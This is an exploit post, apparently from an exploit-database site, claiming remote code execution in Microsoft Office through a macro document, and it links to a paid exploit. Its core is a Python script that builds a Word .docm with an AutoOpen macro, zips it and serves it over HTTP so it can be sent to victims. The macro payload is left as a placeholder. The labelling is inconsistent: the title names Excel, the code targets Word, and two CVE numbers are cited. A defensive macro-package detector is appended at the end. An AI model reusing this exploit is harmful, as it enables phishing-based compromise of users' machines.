# Titles: Microsoft Excel LTSC 2024 - Remote Code Execution (RCE)
# Author: nu11secur1ty
# Date: 06/16/2025
# Vendor: Microsoft
# Software: https://www.microsoft.com/en/microsoft-365/excel?market=af
# Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-27751
# CVE-2025-47957
# Versions: Microsoft Office LTSC 2024, Microsoft Office LTSC 2021, Microsoft 365 Apps for Enterprise

## Description:
The attacker can trick any user into opening and executing their code by sending a malicious DOCX file via email or a streaming server. After the victim executes it, their machine can be infected, or worse: this could be the end of their Windows machine!
WARNING: AMPUTATE THE MACROS OPTIONS FROM YOUR OFFICE 365!!!

STATUS: HIGH-CRITICAL Vulnerability

[+]Exploit:

```
#!/usr/bin/python
# CVE-2025-47957 by nu11secur1ty
import os
import time
import zipfile
import threading
import http.server
import socket
import socketserver
import win32com.client


def get_local_ip():
    """Get the LAN IP address of the current machine."""
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        s.connect(("8.8.8.8", 80))  # External DNS, just for routing
        ip = s.getsockname()[0]
        s.close()
        return ip
    except OSError:
        return "127.0.0.1"


def create_docm_with_auto_macro(filename):
    script_dir = os.path.dirname(os.path.abspath(__file__))
    full_path = os.path.join(script_dir, filename)

    word = win32com.client.Dispatch("Word.Application")
    word.Visible = False
    doc = word.Documents.Add()
    doc.Content.Text = "This document contains an auto-starting macro."

    vbproject = doc.VBProject
    vbcomponent = vbproject.VBComponents.Add(1)  # Standard Module

    macro_code = '''
Sub AutoOpen()
    Call YOUR_PoC
End Sub

Sub YOUR_PoC()
    Dim Program As String
    Dim TaskID As Double
    On Error Resume Next
    Program = "YOUR_EXPLOIT_HERE"
    TaskID = YOUR_TASK_HERE
    If Err <> 0 Then
        MsgBox "Can't start " & Program
    End If
End Sub
'''
    vbcomponent.CodeModule.AddFromString(macro_code)

    wdFormatXMLDocumentMacroEnabled = 13
    doc.SaveAs(full_path, FileFormat=wdFormatXMLDocumentMacroEnabled)
    doc.Close()
    word.Quit()
    print(f"[+] Macro-enabled .docm saved at: {full_path}")
    return full_path


def compress_to_zip(filepath):
    zip_path = filepath + '.zip'
    with zipfile.ZipFile(zip_path, 'w') as zipf:
        zipf.write(filepath, arcname=os.path.basename(filepath))
    print(f"[+] Compressed to ZIP: {zip_path}")
    return zip_path


def start_http_server(directory, port=8000):
    os.chdir(directory)
    handler = http.server.SimpleHTTPRequestHandler
    httpd = socketserver.TCPServer(("", port), handler)
    ip = get_local_ip()
    print(f"[+] HTTP server running at: http://{ip}:{port}/")
    # Serve in a daemon thread so the main thread can wait for Ctrl+C
    thread = threading.Thread(target=httpd.serve_forever)
    thread.daemon = True
    thread.start()
    return httpd


if __name__ == "__main__":
    filename = "CVE-2025-47957.docm"
    docm_path = create_docm_with_auto_macro(filename)
    zip_path = compress_to_zip(docm_path)
    server = start_http_server(os.path.dirname(docm_path))

    try:
        print("[*] Server running — press Ctrl+C to stop...")
        while True:
            time.sleep(1)
    except KeyboardInterrupt:
        print("\n[!] Ctrl+C detected — shutting down server...")
        server.shutdown()
        print("[+] The Exploit Server stopped. Goodbye!")
```

# Reproduce:
[href](https://www.youtube.com/watch?v=r4NsGrO56yo)

# Buy an exploit only:
[href](https://satoshidisk.com/pay/COeJqt)

# Time spent:
01:37:00

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
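
A defender-side check for the artifact the script above produces, a macro-enabled OOXML package that may be wrapped in a ZIP. This is an added example, not the author's code: `find_macro_packages`, `build_sample`, and the depth and size limits are assumptions, and the sample archive is constructed.

```python
import io
import zipfile

# Content types that mark a Word main part as macro-enabled (.docm / .dotm).
MACRO_TYPES = (
    b"application/vnd.ms-word.document.macroenabled.main+xml",
    b"application/vnd.ms-word.template.macroenabledtemplate.main+xml",
)
MAX_DEPTH = 3                   # assumed bound on nested archives
MAX_MEMBER = 50 * 1024 * 1024   # assumed per-member size cap (zip-bomb guard)

def find_macro_packages(data, name="<input>", depth=0):
    """Return [(path, reasons)] for each OOXML package in `data` that carries VBA."""
    findings = []
    if depth > MAX_DEPTH or not zipfile.is_zipfile(io.BytesIO(data)):
        return findings
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            reasons = []
            members = [i for i in zf.infolist()
                       if not i.is_dir() and i.file_size <= MAX_MEMBER]
            # The VBA project is stored in a part named vbaProject.bin.
            if any(i.filename.lower().endswith("vbaproject.bin") for i in members):
                reasons.append("vbaProject.bin part")
            for i in members:
                body = zf.read(i)
                if i.filename == "[Content_Types].xml":
                    if any(t in body.lower() for t in MACRO_TYPES):
                        reasons.append("macro-enabled content type")
                elif body[:4] == b"PK\x03\x04":
                    # Nested container, e.g. a .docm inside a .zip attachment.
                    findings += find_macro_packages(body, f"{name}!{i.filename}", depth + 1)
            if reasons:
                findings.insert(0, (name, reasons))
    except (zipfile.BadZipFile, RuntimeError):
        pass  # corrupt or encrypted archive: nothing to report here
    return findings

def build_sample():
    """Constructed sample: a stub macro-enabled package inside an outer ZIP."""
    inner, outer = io.BytesIO(), io.BytesIO()
    with zipfile.ZipFile(inner, "w") as z:
        z.writestr("[Content_Types].xml", '<Types><Override ContentType='
                   '"application/vnd.ms-word.document.macroEnabled.main+xml"/></Types>')
        z.writestr("word/vbaProject.bin", b"stub, not a real VBA project")
    with zipfile.ZipFile(outer, "w") as z:
        z.writestr("report.docm", inner.getvalue())
    return outer.getvalue()
```

The check keys on package contents rather than the file extension, so it can run on mail attachments or proxy downloads before they reach Word.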